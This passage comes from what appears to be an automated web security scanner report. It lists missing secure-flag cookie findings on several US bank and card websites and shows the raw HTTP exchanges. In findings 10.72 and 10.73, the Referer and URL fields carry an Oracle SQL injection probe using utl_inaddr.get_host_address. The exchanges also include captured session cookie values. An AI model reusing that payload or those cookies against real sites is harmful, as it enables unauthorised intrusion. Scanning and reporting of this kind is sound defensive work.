User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 29 Nov 2010 12:03:47 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Fri, 04 Feb 2011 06:53:10 GMT
Date: Thu, 03 Feb 2011 14:16:16 GMT
Content-Length: 18578
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com

/* Personalization Enterprise Service
*
* Standard Approach : JSON Integration
* Created: Renjith Lal
* Date: 04/02/2010
*---------------------------------------------------------------------
...[SNIP]...

10.57. https://home.americanexpress.com/home/pz/pes_login.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://home.americanexpress.com
Path:   /home/pz/pes_login.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /home/pz/pes_login.js HTTP/1.1
Host: home.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 28 Oct 2010 21:43:44 GMT
Server: IBM_HTTP_Server
Content-Type: application/x-javascript
Expires: Thu, 03 Feb 2011 20:49:12 GMT
Date: Thu, 03 Feb 2011 14:16:16 GMT
Content-Length: 7866
Connection: close
Set-Cookie: bandwidthdetect=vhigh; expires=Sat, 05-Mar-2011 14:16:16 GMT; path=/; domain=.americanexpress.com

/* Personalization Enterprise Service
*
* Code below this comment is related to the Client Integrations for the PES JSON response .
*-----------------------------------------------------------
...[SNIP]...

10.58. https://itreasury.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://itreasury.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: itreasury.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Set-Cookie: COOKIE-ITREASURY.REGIONSTEST.COM=R1009885090; path=/
Set-Cookie: ITREASURY2.REGIONS.COM=R3486410295; path=/
Date: Thu, 03 Feb 2011 15:51:13 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 06 Nov 2009 15:20:43 GMT
ETag: "18cc7e-ee-632508c0"
Accept-Ranges: bytes
Content-Length: 238
Cache-Control: private, no-cache, no-store, post-check=0, pre-check=0, no-cache="set-cookie,set-cookie2"
Expires: Sat, 6 May 1995 12:00:00 GMT
Connection: close
Content-Type: text/html

<!--Configuration file needed for webserver to redirect to Login Screen when lazy url is entered-->
<html>
<head>
<title>Login</title>
<script language="javascript">
window.location="/wcmfd/wcmpw/Cust
...[SNIP]...

10.59. https://labs.wellsfargo.com/rapidalerts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://labs.wellsfargo.com
Path:   /rapidalerts/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rapidalerts/ HTTP/1.1
Host: labs.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v1st=7904FA44F0E8E4E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.wellsfargo.com
Set-Cookie: JSESSIONID=D972FC3BF23E3E95BEC7A3C1F716FC0A; Path=/rapidalerts; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 03 Feb 2011 13:45:18 GMT
Connection: close
Set-Cookie: LABS_Cookie=2376211466.64288.0000; path=/
Content-Length: 6311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

10.60. https://online.americanexpress.com/myca/acctsumm/us/action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/acctsumm/us/action

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myca/acctsumm/us/action HTTP/1.1
Host: online.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 13:45:22 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=10.10.14.1-1296740722368118; Path=/; expires=Sun, 07-Feb-16 13:45:22 GMT; domain=.americanexpress.com
Location: https://online.americanexpress.com/myca/acctsumm/us/en/en_US/common/SorryTemplate.jsp
Content-Length: 0
Set-Cookie: JSESSIONID=0000FBK3SQQvSewXpY5k8hB1h4g:14cr019am; Path=/; Secure
Expires: 0
Cache-Control: no-cache,no-store
Set-Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1e045525d5f4f58455e445a4a42861c;path=/
Content-Type: text/html
Content-Language: en-US
Connection: close
Set-Cookie: sroute=621677066.58148.0000; path=/


10.61. https://online.bbandt.com/online/selfservice/main.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.bbandt.com
Path:   /online/selfservice/main.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/selfservice/main.do HTTP/1.1
Host: online.bbandt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-type: text/html; charset=iso-8859-1
date: Thu, 03 Feb 2011 14:10:48 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 305
Set-Cookie: PD_STATEFUL_70873996-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/
Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /online/selfservice/main.do was not found on this ser
...[SNIP]...

10.62. https://online.bbandt.com/online/selfservice/main.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.bbandt.com
Path:   /online/selfservice/main.do

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /online/selfservice/main.do?flow= HTTP/1.1
Host: online.bbandt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
connection: close
content-type: text/html; charset=iso-8859-1
date: Thu, 03 Feb 2011 14:10:49 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 305
Set-Cookie: PD_STATEFUL_7092e99e-26bc-11e0-8edc-00145ee71681=%2Fonline%2Fselfservice; Path=/
Via: 1.1 unknown (Alteon iSD-SSL/5.1.7)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /online/selfservice/main.do was not found on this ser
...[SNIP]...

10.63. https://online.wellsfargo.com/das/channel/enrollDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /das/channel/enrollDisplay

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /das/channel/enrollDisplay HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:45:24 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: no-store, no-cache, private, must-revalidate
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
KONICHIWA5: enrollment/enrollIdentify
Content-Language: en-US
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: COOKIE_SID=r9jyNKxJHkl1GTdJ5lWTN93XQhQcNjtVQB3sY9GpnkqTlsNRmp0k!-727606097;secure;path=/;domain=.wellsfargo.com;
Set-Cookie: KCOOKIE=;secure;expires=Thu, 01-Jan-1970 09:00:00 GMT;path=/;domain=.wellsfargo.com;
Set-Cookie: BRAND_COOKIE=COB;secure;path=/;domain=.wellsfargo.com;
Set-Cookie: wfacookie=O02032011054524763727930;expires=Wed, 03-Feb-2016 21:45:24 GMT;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=zxoWesu0jrPFr7g5lQAAAAAAA5lwALCsoKEWpoGBOdavGHC3fHw9fAdx9lHhGHNl5y3mZiKhR6v4HM0=;path=/;domain=.wellsfargo.com;
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...

10.64. https://online.wellsfargo.com/signon  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.wellsfargo.com
Path:   /signon

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signon HTTP/1.1
Host: online.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: KONICHIWA/1.0
Date: Thu, 03 Feb 2011 13:45:25 GMT
Cache-Control: no-cache="set-cookie"
X-Cnection: close
Location: https://online.wellsfargo.com/login?LOB=CONS&ERROR_CODE=ZXJyb3IuY29va2llc05vdEVuYWJsZWQ%3D
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: OB_SO_ORIGIN=source=alternate;path=/;domain=.wellsfargo.com;
Set-Cookie: ISD_DAS_COOKIE=o2JE22B0Api8bfU5lQAAAAAAA5lwAHR50dFYpTld0G3jevD4Cra98VywSRwUGu1UVqtRMSnXRugM1Ic=;path=/;domain=.wellsfargo.com;
Connection: close

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://online.wellsfargo.com/logi
...[SNIP]...

10.65. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/AuthService HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:17:54 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=0256DD3E2F98102FBA68EF2D383024B5; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=nhGmx3xwk5gjzZG20xMtQOl6qUU=55 4N.WCv7z1Zp27CNLMkWZrcctgrr.2950501; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

10.66. https://payroll.regions.com/servlet/gateway  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://payroll.regions.com
Path:   /servlet/gateway

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/gateway HTTP/1.1
Host: payroll.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=c38625c1a3aedba4074c3d8ad425.Public2; Path=/; Secure
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Thu, 03 Feb 2011 15:51:13 GMT
Connection: close
Set-Cookie: BIGipServerPublic=1880363180.49556.0000; path=/


10.67. https://pfo.us.hsbc.com/hsbcpb/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://pfo.us.hsbc.com
Path:   /hsbcpb/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hsbcpb/ HTTP/1.1
Host: pfo.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ""
Date: Thu, 03 Feb 2011 19:14:49 GMT
Content-type: text/html; charset=ISO-8859-1
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1296760489.597571; path=/; expires=Sun, 31-Jan-2021 19:14:49 GMT
Content-language: en-US
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>

<HEAD>


<link href="theme/template.css" rel="stylesheet" type="text/css">

<script language="javaScript" src="jscript
...[SNIP]...

10.68. https://quickaccount.us.hsbc.com/jsp/oao/relc/cashedge/oao_application_retrieve.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://quickaccount.us.hsbc.com
Path:   /jsp/oao/relc/cashedge/oao_application_retrieve.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsp/oao/relc/cashedge/oao_application_retrieve.jsp?homeid=99992052&BRANDID=PREMIER HTTP/1.1
Host: quickaccount.us.hsbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Date: Thu, 03 Feb 2011 16:24:00 GMT
Pragma: no-cache
Content-Length: 343
Content-Type: text/html; charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: CashEdgeSession=H8phNKWQQXT3SSJMxdd1hnv8H9XrsNz13f0bZvZpjhYy4pMzQm2p!-881912562; path=/; secure; HttpOnly=
Set-Cookie: BRANDID=PREMIER
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_wt-rvjdlbddpvou.vt.itcd.dpn*443=ffffffff0929123f45525d5f4f58455e445a4a422a73;path=/;secure;httponly


<script>
function MM_goToURL() { //v3.0
var i, args=MM_goToURL.arguments; document.MM_returnValue = false;
for (i=0; i<(args.length-1); i+=2) eval(a
...[SNIP]...

10.69. https://sales.liveperson.net/hc/13041680/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sales.liveperson.net
Path:   /hc/13041680/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/13041680/?cmd=file&file=visitorWantsToChat&site=13041680&byhref=1&AEPARAMS&SESSIONVAR!StaticButtonNameNoScript=Generic HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: HumanClickKEY=2662170475251338767; LivePersonID=LP i=16101423669632,d=1294435351; HumanClickSiteContainerID_2489482=STANDALONE;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 13:47:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296740856:0; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net
Set-Cookie: HumanClickKEY=4239242515931163064; path=/hc/13041680
Set-Cookie: HumanClickSiteContainerID_13041680=STANDALONE; path=/hc/13041680
Set-Cookie: LivePersonID=-16101423669632-1296740856:-1:-1:-1:-1; expires=Fri, 03-Feb-2012 13:47:36 GMT; path=/hc/13041680; domain=.liveperson.net
Set-Cookie: HumanClickCHATKEY=7675585467513136947; path=/hc/13041680; secure
Content-Type: text/html
Last-Modified: Thu, 03 Feb 2011 13:47:36 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 5641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">
<head>
<link href
...[SNIP]...

10.70. https://sslgypsy-test.superpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sslgypsy-test.superpages.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: sslgypsy-test.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1296750407186-sslgypsy-test.superpages.com-7577407-636051; Domain=.superpages.com; Expires=Tue, 02-Feb-2016 16:26:47 GMT; Path=/
Location: http://sslgypsy-test.superpages.com/yp.advanced.jsp?
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 16:26:47 GMT
Connection: close
Set-Cookie: NSC_ttmhzqtz-443=ffffffff9482124945525d5f4f58455e445a4a421548;expires=Thu, 03-Feb-2011 16:28:47 GMT;path=/;secure


10.71. https://tokens.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tokens.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: tokens.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Location: http://tokens.regions.com/iisstart.htm
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:53:40 GMT
Set-Cookie: NSC_uplfot.sfhjpot.dpn-wjq=ffffffffaf130ec145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:17:37 GMT;path=/
Set-Cookie: rfaft2c1=rbZofua541Qr+S3Xp4Xyk3bIMdQA1; Domain=.regions.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regions.com_%2F_wlf=TlNDX3VwbGZvdC5zZmhqcG90LmRwbi13anFf?TxQcFo0NsG+CTkoDF7kyEhxxlOEA&; Domain=.regions.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Set-Cookie: NSC_uplfot.sfhjpot.dpn=ffffffffaf130d4145525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:04:28 GMT;path=/;secure
Content-Length: 148

<HTML>
<HEAD>
<TITLE>Token Management System</TITLE>
</HEAD>
<FRAMESET cols="100%">
<FRAME src="RSASWE/WXUserHome.do">
</FRAMESET>
</HTML>

10.72. https://redcated/jaction/00asup_RetargetingSecure_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://redcated
Path:   /jaction/00asup_RetargetingSecure_1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaction/00asup_RetargetingSecure_1 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: redcated
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296759635-11855865; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=82A8A851D01949528AD578CC9601958F; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Date: Thu, 03 Feb 2011 19:00:35 GMT
Connection: close
Content-Length: 485

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['https://a248.e.akamai.net/img.redcated/images/pixel.gif','https://ad.bizo.com/pixel?id=175863&t=2','https
...[SNIP]...

10.73. https://vms.boldchat.com/aid/3760177095415339810/bc.pv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vms.boldchat.com
Path:   /aid/3760177095415339810/bc.pv

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.pv?blur=false&poll=60000&url=https%3A//www.supermedia.com/spportal/spportalFlow.do%3F_flowExecutionKey%3D%2527%257C%257C%28utl_inaddr.get_host_address%28%28select+chr%2895%29%257C%257Cchr%2833%29%257C%257Cchr%2864%29%257C%257Cchr%2851%29%257C%257Cchr%28100%29%257C%257Cchr%28105%29%257C%257Cchr%28108%29%257C%257Cchr%28101%29%257C%257Cchr%28109%29%257C%257Cchr%28109%29%257C%257Cchr%2897%29+from+DUAL%29%29%29%257C%257C%2527&pvid=1296759669758946057&wdid=798708614246318013&idid=2139287495442682134&cp=https&vr=Processing%20Error%20Title&1296759669434 HTTP/1.1
Accept: */*
Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: vms.boldchat.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: bc-visitor-id=0=0

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
X-Boldcenter-PageViewID: 1296759669758946057
X-Boldcenter-VisitID: 9223372036839666059
Set-Cookie: bc-visitor-id=798708614246318013=3840678644403429768&0=0; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:00:36 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839666059; domain=.boldchat.com; path=/
Content-Type: image/gif
Connection: close
Date: Thu, 03 Feb 2011 19:00:36 GMT
Content-Length: 35

GIF89a.............,........@..D..;

10.74. https://www.americanexpress.com/airlines-credit-card/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /airlines-credit-card/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /airlines-credit-card/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:49 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740869522520; path=/; expires=Sun, 07-Feb-16 13:47:49 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431291
Expires: Fri, 24 Sep 2010 06:26:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 33688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.75. https://www.americanexpress.com/credit-card-rewards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /credit-card-rewards/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /credit-card-rewards/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:53 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740873112805; path=/; expires=Sun, 07-Feb-16 13:47:53 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-11431221
Expires: Fri, 24 Sep 2010 06:27:32 GMT
Connection: close
Content-Type: text/html
Content-Length: 34269

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...

10.76. https://www.americanexpress.com/gift/giftcardslanding.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /gift/giftcardslanding.shtml

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gift/giftcardslanding.shtml HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:48 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740868411065; path=/; expires=Sun, 07-Feb-16 13:47:48 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
Cache-Control: max-age=-284016
Expires: Mon, 31 Jan 2011 06:54:12 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 64996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
   
...[SNIP]...

10.77. https://www.americanexpress.com/gold-card/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.americanexpress.com
Path:   /gold-card/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gold-card/ HTTP/1.1
Host: www.americanexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 13:47:55 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1296740875303415; path=/; expires=Sun, 07-Feb-16 13:47:55 GMT; domain=.americanexpress.com
Accept-Ranges: bytes
